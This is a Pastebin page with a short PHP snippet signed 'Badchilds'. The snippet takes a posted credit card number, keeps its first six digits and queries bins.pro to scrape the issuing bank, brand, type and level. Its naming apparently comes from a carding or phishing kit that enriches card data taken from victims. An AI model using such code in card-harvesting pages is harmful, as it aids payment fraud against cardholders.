Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Badchilds - Get Bin from Credit card.
- $bin = str_replace(' ', '', $_POST['cc_number']);
- $bin = substr($bin, 0, 6);
- $Badchilds = explode($bin, file_get_contents("http://bins.pro/search?action=searchbins&bins=" . $bin . "&bank=&country="));
- $xBadcc = explode("</td><td>", $Badchilds[2]);
- $Bank = explode("</td></tr>", $xBadcc[5]);
- $ccbrand = $xBadcc[2];
- $ccbank = $Bank[0];
- $cctype = $xBadcc[3];
- $ccklas = $xBadcc[4];
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement